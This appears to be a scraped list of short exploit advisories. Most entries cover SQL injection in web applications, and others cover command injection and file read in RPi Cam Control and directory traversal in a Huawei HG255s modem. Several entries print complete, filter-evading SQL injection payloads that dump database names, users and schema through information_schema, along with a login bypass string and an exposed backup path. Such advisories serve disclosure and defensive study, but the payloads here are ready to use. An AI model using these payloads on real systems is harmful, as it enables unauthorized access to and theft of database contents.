The vulnerability allows an attacker to inject sql commands into the vulnerable parameter of the web application. Proof of Concept examples are provided in the text.
The vulnerability allows an attacker to inject sql commands into the vulnerable parameter. Proof of Concept examples are provided in the text.
The vulnerability allows an attacker to inject sql commands into the vulnerable parameter of the application. Proof of Concept: http://localhost/[PATH]/result/[SQL]/eFe http://localhost/[PATH]/business/[SQL]/eFe
RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection. Local File Read can be done by sending a POST request to the preview.php page with the download1 parameter set to the path of the file to be read. Blind Command Injection can be done by sending a POST request to the preview.php page with the convertCmd parameter set to the command to be executed. Blind Command Injection can be used with Local File Read to properly get the output of injected command.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/job-details/[SQL]/eFe -131'+/*!50000UNION*/(/*!50000SELECT*/+0x283129,0x283229,0x283329,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229)--+-/eFe
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: http://localhost/[PATH]/taskers?skills=[SQL] 63'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+1=1='
The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'escort' in the prof_detils.html and ajax_rating.php files.
A directory traversal vulnerability was discovered in Huawei HG255s modem. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal sequences (e.g. “../”) to the vulnerable device. This allows the attacker to access sensitive information such as the /etc/passwd file. A proof-of-concept video and HTTP request are available.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: Sql http://localhost/[PATH]/editclient.php?id=[SQL] -100+/*!11122UniOn*/+/*!11122SeleCt*/+0x283129,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283329,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION())--+- Bypass http://localhost/[PATH]/index.php User: 'or 1=1 or ''=' Pass: anything Backup http://localhost/[PATH]/backups/index.php?client_name=admin Etc...
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: Sql http://localhost/[PATH]/ezban.php?id=[SQL]&action=show 100++aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+1=1&action=show
Services By CQR